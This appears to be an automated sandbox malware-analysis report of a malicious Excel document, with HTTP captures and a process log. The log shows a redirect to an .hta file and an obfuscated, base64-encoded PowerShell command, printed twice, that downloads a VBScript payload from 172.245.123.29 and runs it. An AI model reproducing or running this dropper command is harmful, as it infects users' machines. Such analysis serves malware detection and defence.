                                                                      Data Ascii: 2520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%2525
                                                                      Nov 28, 2024 07:28:11.300332069 CET1236INData Raw: 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 33 41 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30
                                                                      Data Ascii: 0%25252520%2525253A%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%2525252
                                                                      Nov 28, 2024 07:28:11.300343990 CET1236INData Raw: 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35
                                                                      Data Ascii: 5252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%2
                                                                      Nov 28, 2024 07:28:11.420274019 CET1236INData Raw: 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32
                                                                      Data Ascii: 2520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%2525


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      2192.168.2.2249167172.245.123.29803148C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Nov 28, 2024 07:28:16.699031115 CET382OUTGET /1343/seemebestthingswithentirethingswithgreatnaturethings.tIF HTTP/1.1
                                                                      Accept: */*
                                                                      UA-CPU: AMD64
                                                                      Accept-Encoding: gzip, deflate
                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                      Host: 172.245.123.29
                                                                      Connection: Keep-Alive
                                                                      Nov 28, 2024 07:28:17.864547014 CET1236INHTTP/1.1 200 OK
                                                                      Date: Thu, 28 Nov 2024 06:28:17 GMT
                                                                      Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.1.25
                                                                      Last-Modified: Wed, 27 Nov 2024 06:47:30 GMT
                                                                      ETag: "28a2e-627df56f0eef7"
                                                                      Accept-Ranges: bytes
                                                                      Content-Length: 166446
                                                                      Keep-Alive: timeout=5, max=100
                                                                      Connection: Keep-Alive
                                                                      Content-Type: image/tiff
                                                                      Data Raw: ff fe 0d 00 0a 00 0d 00 0a 00 4b 00 4c 00 63 00 76 00 4b 00 57 00 5a 00 4c 00 4c 00 42 00 47 00 42 00 67 00 69 00 4c 00 20 00 3d 00 20 00 22 00 4b 00 57 00 74 00 72 00 69 00 63 00 6c 00 69 00 6e 00 69 00 61 00 72 00 63 00 68 00 61 00 4c 00 6a 00 78 00 6d 00 71 00 41 00 63 00 41 00 55 00 61 00 72 00 22 00 0d 00 0a 00 67 00 62 00 68 00 78 00 47 00 50 00 70 00 4b 00 6d 00 55 00 6f 00 62 00 57 00 51 00 70 00 20 00 3d 00 20 00 22 00 63 00 63 00 57 00 62 00 4e 00 57 00 6b 00 4f 00 6b 00 69 00 4c 00 55 00 69 00 48 00 41 00 22 00 0d 00 0a 00 53 00 41 00 4b 00 4e 00 74 00 6e 00 65 00 6b 00 41 00 50 00 55 00 57 00 4c 00 7a 00 7a 00 20 00 3d 00 20 00 22 00 62 00 57 00 4b 00 69 00 42 00 4b 00 68 00 48 00 47 00 65 00 64 00 64 00 43 00 4b 00 62 00 22 00 0d 00 0a 00 6d 00 57 00 61 00 4a 00 61 00 6d 00 6f 00 50 00 70 00 76 00 5a 00 68 00 4e 00 69 00 6b 00 20 00 3d 00 20 00 22 00 7a 00 6f 00 53 00 41 00 4b 00 6e 00 64 00 4f 00 65 00 57 00 71 00 47 00 4f 00 4c 00 63 00 22 00 0d 00 0a 00 4b 00 43 00 49 00 4c 00 61 00 [TRUNCATED]
                                                                      Data Ascii: KLcvKWZLLBGBgiL = "KWtricliniarchaLjxmqAcAUar"gbhxGPpKmUobWQp = "ccWbNWkOkiLUiHA"SAKNtnekAPUWLzz = "bWKiBKhHGeddCKb"mWaJamoPpvZhNik = "zoSAKndOeWqGOLc"KCILabRxPJWtGug = "SHfgJRLecZPciri"KcbLxLpacthuWbZ = "IphWpmhgGBdKJqB"LdGWAahkcPLLkWP = "ALKfWbzcKGmOJmW"cKiQWWnvILlLWCu = "WZmGqqLtiLZRKJc"tpcWPnPWGHPdOmK = "oRRCNWeUeLzLvpO"sUAlHkxLgGKkocu = "kimAjIiexLqPlxu"ZlLAiKTpcRKLIKi = "KgWhpdBaKKLhKCu"omLLmLCjzULzLBA = "WmuWvBWgLzhOhcL
                                                                      Nov 28, 2024 07:28:17.864597082 CET1236INData Raw: 00 22 00 0d 00 0a 00 6a 00 63 00 71 00 53 00 57 00 63 00 4f 00 5a 00 57 00 70 00 4e 00 41 00 69 00 75 00 74 00 20 00 3d 00 20 00 22 00 64 00 7a 00 47 00 68 00 4c 00 5a 00 68 00 4c 00 41 00 4a 00 6b 00 57 00 4e 00 68 00 57 00 22 00 0d 00 0a 00 61
                                                                      Data Ascii: "jcqSWcOZWpNAiut = "dzGhLZhLAJkWNhW"adUefNkWkWoNKLx = "zCrczvLBbkcpine"KcGKLqdZeIGOLWb = "LLLrUzKWrWiJkWk"oGLKLRp
                                                                      Nov 28, 2024 07:28:17.864609003 CET448INData Raw: 00 42 00 63 00 47 00 6c 00 57 00 4a 00 71 00 4b 00 6d 00 52 00 61 00 66 00 61 00 22 00 0d 00 0a 00 6c 00 6d 00 57 00 6c 00 4b 00 57 00 62 00 76 00 67 00 71 00 74 00 61 00 6b 00 4c 00 70 00 20 00 3d 00 20 00 22 00 7a 00 57 00 4b 00 4e 00 65 00 4f
                                                                      Data Ascii: BcGlWJqKmRafa"lmWlKWbvgqtakLp = "zWKNeOvzffktSkA"UnKdrRtricliniarchaQeicWJB = "RbZHWWUABIWCLZA"LZkbuoPpmbKeGQq =
                                                                      Nov 28, 2024 07:28:17.864752054 CET1236INData Raw: 00 64 00 42 00 7a 00 74 00 4e 00 20 00 3d 00 20 00 22 00 4c 00 52 00 4b 00 57 00 6f 00 52 00 75 00 72 00 4c 00 62 00 4c 00 4f 00 64 00 4f 00 6d 00 22 00 0d 00 0a 00 66 00 7a 00 43 00 51 00 4b 00 69 00 55 00 64 00 47 00 71 00 57 00 7a 00 69 00 6d
                                                                      Data Ascii: dBztN = "LRKWoRurLbLOdOm"fzCQKiUdGqWzimU = "fURRhkbbxqdicWA"WcPiUGLgWiheBRN = "BcbZOWcoRNRLmIL"eWkbLpxjqlKOiLW = "W
                                                                      Nov 28, 2024 07:28:17.864763021 CET1236INData Raw: 00 69 00 68 00 22 00 0d 00 0a 00 51 00 4c 00 47 00 69 00 42 00 69 00 4e 00 4b 00 47 00 61 00 4e 00 57 00 4c 00 6c 00 62 00 20 00 3d 00 20 00 22 00 6c 00 55 00 4b 00 4e 00 47 00 7a 00 4c 00 63 00 4c 00 6a 00 47 00 57 00 6b 00 41 00 65 00 22 00 0d
                                                                      Data Ascii: ih"QLGiBiNKGaNWLlb = "lUKNGzLcLjGWkAe"bcefOWzZPamfftb = "GmoJqAfWLfoikch"aGzLWhfqjoHejWL = "cRnKLWkLcugKicz"IPLKI
                                                                      Nov 28, 2024 07:28:17.864773989 CET1236INData Raw: 00 74 00 62 00 4c 00 52 00 74 00 75 00 67 00 4c 00 6f 00 68 00 78 00 22 00 0d 00 0a 00 4c 00 43 00 42 00 63 00 50 00 4b 00 6b 00 57 00 6d 00 68 00 57 00 75 00 61 00 63 00 57 00 20 00 3d 00 20 00 22 00 6d 00 75 00 68 00 43 00 47 00 6b 00 55 00 48
                                                                      Data Ascii: tbLRtugLohx"LCBcPKkWmhWuacW = "muhCGkUHdPoKhWL"WbCWqLifoicKurW = "LWLLbKOneclgLKb"OhWilWrUpurHWKA = "TfOilWWBzhnqei
                                                                      Nov 28, 2024 07:28:17.864790916 CET1236INData Raw: 00 22 00 0d 00 0a 00 4c 00 63 00 4b 00 55 00 7a 00 52 00 75 00 71 00 6b 00 4b 00 52 00 4b 00 47 00 55 00 47 00 20 00 3d 00 20 00 22 00 63 00 50 00 41 00 42 00 4b 00 6b 00 57 00 69 00 6d 00 50 00 70 00 50 00 68 00 4a 00 4c 00 22 00 0d 00 0a 00 4c
                                                                      Data Ascii: "LcKUzRuqkKRKGUG = "cPABKkWimPpPhJL"LWbLLZWAOfdTpLh = "oBjhtKzktvqNrob"WWAUWqtGIOpbiPU = "GWWuLNcKaBhthKa"kGliqLU
                                                                      Nov 28, 2024 07:28:17.865030050 CET1236INData Raw: 00 74 00 67 00 6b 00 4e 00 6b 00 4c 00 57 00 4c 00 55 00 48 00 47 00 68 00 69 00 22 00 0d 00 0a 00 0d 00 0a 00 4c 00 6f 00 66 00 70 00 4b 00 74 00 57 00 43 00 57 00 4c 00 55 00 54 00 7a 00 41 00 63 00 20 00 3d 00 20 00 22 00 55 00 57 00 65 00 4e
                                                                      Data Ascii: tgkNkLWLUHGhi"LofpKtWCWLUTzAc = "UWeNKZiOLupxuzW"KiIloRKiRcjTPPc = "GgiiCLoKLKLBWWe"GhLoisJudNgkOkl = "zxeqIjOOmx
                                                                      Nov 28, 2024 07:28:17.865045071 CET1236INData Raw: 00 52 00 57 00 41 00 7a 00 6b 00 72 00 7a 00 57 00 62 00 20 00 3d 00 20 00 22 00 68 00 5a 00 7a 00 55 00 47 00 47 00 4b 00 55 00 5a 00 6b 00 68 00 69 00 6e 00 53 00 4c 00 22 00 0d 00 0a 00 69 00 4c 00 4c 00 4a 00 47 00 4c 00 70 00 4c 00 62 00 4c
                                                                      Data Ascii: RWAzkrzWb = "hZzUGGKUZkhinSL"iLLJGLpLbLisOkd = "LzeWmWzPLifKdtb"cLWUZtricliniarchaUxoexjlo = "dUgnkLmHmcLzSjd"pWPcG
                                                                      Nov 28, 2024 07:28:17.865056038 CET1236INData Raw: 00 66 00 57 00 50 00 72 00 42 00 68 00 47 00 74 00 55 00 20 00 3d 00 20 00 22 00 6a 00 69 00 42 00 6c 00 4c 00 4c 00 5a 00 55 00 41 00 75 00 47 00 54 00 69 00 7a 00 47 00 22 00 0d 00 0a 00 6f 00 51 00 4b 00 55 00 47 00 4e 00 47 00 68 00 41 00 4b
                                                                      Data Ascii: fWPrBhGtU = "jiBlLLZUAuGTizG"oQKUGNGhAKekWhL = "chGcLfexLAAiKqv"imIiWiiWsdCkbNU = "qbLKGKLPNZpnbbR"WnKGlQhzcTxkouP
                                                                      Nov 28, 2024 07:28:17.984885931 CET1236INData Raw: 00 57 00 6f 00 69 00 4c 00 22 00 0d 00 0a 00 62 00 63 00 76 00 41 00 66 00 72 00 73 00 57 00 62 00 63 00 66 00 55 00 6c 00 6b 00 5a 00 20 00 3d 00 20 00 22 00 73 00 4c 00 47 00 4e 00 6b 00 67 00 63 00 54 00 70 00 69 00 62 00 69 00 70 00 55 00 43
                                                                      Data Ascii: WoiL"bcvAfrsWbcfUlkZ = "sLGNkgcTpibipUC"LkjAumQrodmeisN = "ZitrbWmfLnWkAQq"ZmGuupRiehPkGPU = "IWKPPobxqKZOOCL"d


                                                                      HTTPS Proxied Packets

                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      0192.168.2.2249163152.231.117.864433620C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                      TimestampBytes transferredDirectionData
                                                                      2024-11-28 06:28:03 UTC403OUTGET /G5dF?&rank=uttermost&fan=decorous&barracks=drunk&kettledrum=flippant&banana=loose&bathroom HTTP/1.1
                                                                      Accept: */*
                                                                      UA-CPU: AMD64
                                                                      Accept-Encoding: gzip, deflate
                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                      Host: ljg.cl
                                                                      Connection: Keep-Alive
                                                                      2024-11-28 06:28:04 UTC531INHTTP/1.1 302 Found
                                                                      Server: openresty
                                                                      Date: Thu, 28 Nov 2024 06:28:04 GMT
                                                                      Content-Type: text/plain; charset=utf-8
                                                                      Content-Length: 72
                                                                      Connection: close
                                                                      X-DNS-Prefetch-Control: off
                                                                      X-Frame-Options: SAMEORIGIN
                                                                      Strict-Transport-Security: max-age=15552000; includeSubDomains
                                                                      X-Download-Options: noopen
                                                                      X-Content-Type-Options: nosniff
                                                                      X-XSS-Protection: 0
                                                                      Location: http://172.245.123.29/1343/erg/seemebestthings.hta
                                                                      Vary: Accept
                                                                      Strict-Transport-Security: max-age=63072000;includeSubDomains; preload
                                                                      X-Served-By: ljg.cl
                                                                      2024-11-28 06:28:04 UTC72INData Raw: 46 6f 75 6e 64 2e 20 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 68 74 74 70 3a 2f 2f 31 37 32 2e 32 34 35 2e 31 32 33 2e 32 39 2f 31 33 34 33 2f 65 72 67 2f 73 65 65 6d 65 62 65 73 74 74 68 69 6e 67 73 2e 68 74 61
                                                                      Data Ascii: Found. Redirecting to http://172.245.123.29/1343/erg/seemebestthings.hta


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      1192.168.2.2249165152.231.117.864433948C:\Windows\System32\mshta.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      2024-11-28 06:28:09 UTC427OUTGET /G5dF?&rank=uttermost&fan=decorous&barracks=drunk&kettledrum=flippant&banana=loose&bathroom HTTP/1.1
                                                                      Accept: */*
                                                                      Accept-Language: fr-FR
                                                                      UA-CPU: AMD64
                                                                      Accept-Encoding: gzip, deflate
                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                      Host: ljg.cl
                                                                      Connection: Keep-Alive
                                                                      2024-11-28 06:28:09 UTC531INHTTP/1.1 302 Found
                                                                      Server: openresty
                                                                      Date: Thu, 28 Nov 2024 06:28:09 GMT
                                                                      Content-Type: text/plain; charset=utf-8
                                                                      Content-Length: 72
                                                                      Connection: close
                                                                      X-DNS-Prefetch-Control: off
                                                                      X-Frame-Options: SAMEORIGIN
                                                                      Strict-Transport-Security: max-age=15552000; includeSubDomains
                                                                      X-Download-Options: noopen
                                                                      X-Content-Type-Options: nosniff
                                                                      X-XSS-Protection: 0
                                                                      Location: http://172.245.123.29/1343/erg/seemebestthings.hta
                                                                      Vary: Accept
                                                                      Strict-Transport-Security: max-age=63072000;includeSubDomains; preload
                                                                      X-Served-By: ljg.cl
                                                                      2024-11-28 06:28:09 UTC72INData Raw: 46 6f 75 6e 64 2e 20 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 68 74 74 70 3a 2f 2f 31 37 32 2e 32 34 35 2e 31 32 33 2e 32 39 2f 31 33 34 33 2f 65 72 67 2f 73 65 65 6d 65 62 65 73 74 74 68 69 6e 67 73 2e 68 74 61
                                                                      Data Ascii: Found. Redirecting to http://172.245.123.29/1343/erg/seemebestthings.hta


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      2192.168.2.2249168193.30.119.2054432036C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      2024-11-28 06:28:27 UTC211OUTGET /api/file/get?filekey=shTPHbCPX8o-lOtCqHLG6_0xCy-xl4tnxlAVbQ95-dviTK5cARaNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vid=e0109638c9bfb9571732531309b5ff7c HTTP/1.1
                                                                      Host: 3105.filemail.com
                                                                      Connection: Keep-Alive
                                                                      2024-11-28 06:28:28 UTC234INHTTP/1.1 500 Internal Server Error
                                                                      Cache-Control: no-cache,no-store
                                                                      Pragma: no-cache
                                                                      Transfer-Encoding: chunked
                                                                      Content-Type: application/json; charset=utf-8
                                                                      Expires: -1
                                                                      Date: Thu, 28 Nov 2024 06:28:27 GMT
                                                                      Connection: close
                                                                      2024-11-28 06:28:28 UTC307INData Raw: 31 32 63 0d 0a 7b 22 76 61 6c 69 64 61 74 69 6f 6e 65 72 72 6f 72 73 22 3a 5b 7b 22 50 72 6f 70 65 72 74 79 4e 61 6d 65 22 3a 22 74 72 61 6e 73 66 65 72 69 64 22 2c 22 45 72 72 6f 72 43 6f 64 65 22 3a 22 54 72 61 6e 73 66 65 72 45 78 70 69 72 65 64 22 2c 22 45 72 72 6f 72 4d 65 73 73 61 67 65 22 3a 22 54 68 69 73 20 74 72 61 6e 73 66 65 72 20 69 73 20 65 78 70 69 72 65 64 22 7d 5d 2c 22 72 65 73 70 6f 6e 73 65 73 74 61 74 75 73 22 3a 22 54 72 61 6e 73 66 65 72 45 78 70 69 72 65 64 22 2c 22 65 72 72 6f 72 69 64 22 3a 22 37 32 62 61 39 33 36 35 2d 30 63 36 35 2d 34 34 32 32 2d 38 63 30 39 2d 38 64 61 39 66 37 32 33 62 36 33 36 22 2c 22 65 72 72 6f 72 6d 65 73 73 61 67 65 22 3a 22 74 72 61 6e 73 66 65 72 69 64 20 2d 2d 3e 20 5b 54 72 61 6e 73 66 65 72 45 78
                                                                      Data Ascii: 12c{"validationerrors":[{"PropertyName":"transferid","ErrorCode":"TransferExpired","ErrorMessage":"This transfer is expired"}],"responsestatus":"TransferExpired","errorid":"72ba9365-0c65-4422-8c09-8da9f723b636","errormessage":"transferid --> [TransferEx
                                                                      2024-11-28 06:28:28 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                      Data Ascii: 0


                                                                      Statistics

                                                                      CPU Usage

                                                                      Click to jump to process

                                                                      Memory Usage

                                                                      Click to jump to process

                                                                      High Level Behavior Distribution

                                                                      Click to dive into process behavior distribution

                                                                      Behavior

                                                                      Click to jump to process

                                                                      System Behavior

                                                                      General

                                                                      Target ID:0
                                                                      Start time:01:27:06
                                                                      Start date:28/11/2024
                                                                      Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                      Wow64 process (32bit):false
                                                                      Commandline:"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                                                                      Imagebase:0x13f340000
                                                                      File size:28'253'536 bytes
                                                                      MD5 hash:D53B85E21886D2AF9815C377537BCAC3
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:false

                                                                      General

                                                                      Target ID:4
                                                                      Start time:01:28:04
                                                                      Start date:28/11/2024
                                                                      Path:C:\Windows\System32\mshta.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\System32\mshta.exe -Embedding
                                                                      Imagebase:0x13fb10000
                                                                      File size:13'824 bytes
                                                                      MD5 hash:95828D670CFD3B16EE188168E083C3C5
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      General

                                                                      Target ID:6
                                                                      Start time:01:28:11
                                                                      Start date:28/11/2024
                                                                      Path:C:\Windows\System32\cmd.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:"C:\Windows\system32\cmd.exe" "/C POwErSHeLL -EX byPasS -noP -w 1 -C dEvICEcReDEnTialDepLOYMeNt ; invOkE-ExPREsSiOn($(invOKe-expreSSIon('[sYStEM.TExt.EnCOdINg]'+[ChAR]0X3a+[cHar]58+'Utf8.GETStRING([sYsTem.coNVeRT]'+[cHAr]58+[chaR]58+'fromBASE64String('+[ChaR]0X22+'JHFidmRDTlAzWCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURELVRZUGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NZW1iZXJERUZJTklUaW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJMTW9uIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEZOcEpJS3Asc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB5R09zTE1jLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgckFuYlBOLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFhuVmJyQyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGtoenNHaU9LKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgImpMYmZUSnJTSXVqIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BbWVzUGFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQXcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRxYnZkQ05QM1g6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNzIuMjQ1LjEyMy4yOS8xMzQzL3NlZW1lYmVzdHRoaW5nc3dpdGhlbnRpcmV0aGluZ3N3aXRoZ3JlYXRuYXR1cmV0aGluZ3MudElGIiwiJGVuVjpBUFBEQVRBXHNlZW1lYmVzdHRoaW5nc3dpdGhlbnRpcmV0aGluZ3N3aXRoZ3JlYXRuYXR1cmV0aGluZy52YlMiLDAsMCk7c1RhUlQtU0xlZVAoMyk7aUkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW52OkFQUERBVEFcc2VlbWViZXN0dGhpbmdzd2l0aGVudGlyZXRoaW5nc3dpdGhncmVhdG5hdHVyZXRoaW5nLnZiUyI='+[CHaR]34+'))')))"
                                                                      Imagebase:0x49d40000
                                                                      File size:345'088 bytes
                                                                      MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      General

                                                                      Target ID:8
                                                                      Start time:01:28:11
                                                                      Start date:28/11/2024
                                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:POwErSHeLL -EX byPasS -noP -w 1 -C dEvICEcReDEnTialDepLOYMeNt ; invOkE-ExPREsSiOn($(invOKe-expreSSIon('[sYStEM.TExt.EnCOdINg]'+[ChAR]0X3a+[cHar]58+'Utf8.GETStRING([sYsTem.coNVeRT]'+[cHAr]58+[chaR]58+'fromBASE64String('+[ChaR]0X22+'JHFidmRDTlAzWCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURELVRZUGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NZW1iZXJERUZJTklUaW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJMTW9uIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEZOcEpJS3Asc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB5R09zTE1jLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgckFuYlBOLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFhuVmJyQyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGtoenNHaU9LKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgImpMYmZUSnJTSXVqIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BbWVzUGFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQXcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRxYnZkQ05QM1g6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNzIuMjQ1LjEyMy4yOS8xMzQzL3NlZW1lYmVzdHRoaW5nc3dpdGhlbnRpcmV0aGluZ3N3aXRoZ3JlYXRuYXR1cmV0aGluZ3MudElGIiwiJGVuVjpBUFBEQVRBXHNlZW1lYmVzdHRoaW5nc3dpdGhlbnRpcmV0aGluZ3N3aXRoZ3JlYXRuYXR1cmV0aGluZy52YlMiLDAsMCk7c1RhUlQtU0xlZVAoMyk7aUkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW52OkFQUERBVEFcc2VlbWViZXN0dGhpbmdzd2l0aGVudGlyZXRoaW5nc3dpdGhncmVhdG5hdHVyZXRoaW5nLnZiUyI='+[CHaR]34+'))')))"
                                                                      Imagebase:0x13f480000
                                                                      File size:443'392 bytes
                                                                      MD5 hash:A575A7610E5F003CC36DF39E07C4BA7D
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:moderate
                                                                      Has exited:true

                                                                      General

                                                                      Target ID:9
                                                                      Start time:01:28:14
                                                                      Start date:28/11/2024
                                                                      Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\rpgvm2d4\rpgvm2d4.cmdline"
                                                                      Imagebase:0x13f9e0000
                                                                      File size:2'758'280 bytes
                                                                      MD5 hash:23EE3D381CFE3B9F6229483E2CE2F9E1
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:moderate
                                                                      Has exited:true

                                                                      General

                                                                      Target ID:10
                                                                      Start time:01:28:14
                                                                      Start date:28/11/2024
                                                                      Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESADA.tmp" "c:\Users\user\AppData\Local\Temp\rpgvm2d4\CSCF316C6EB41654F6E91711E8CA420E01A.TMP"
                                                                      Imagebase:0x13f530000
                                                                      File size:52'744 bytes
                                                                      MD5 hash:C877CBB966EA5939AA2A17B6A5160950
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      General

                                                                      Target ID:12
                                                                      Start time:01:28:20
                                                                      Start date:28/11/2024
                                                                      Path:C:\Windows\System32\wscript.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seemebestthingswithentirethingswithgreatnaturething.vbS"
                                                                      Imagebase:0xff450000
                                                                      File size:168'960 bytes
                                                                      MD5 hash:045451FA238A75305CC26AC982472367
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      General

                                                                      Target ID:13
                                                                      Start time:01:28:21
                                                                      Start date:28/11/2024
                                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      Wow64 process (32bit):false
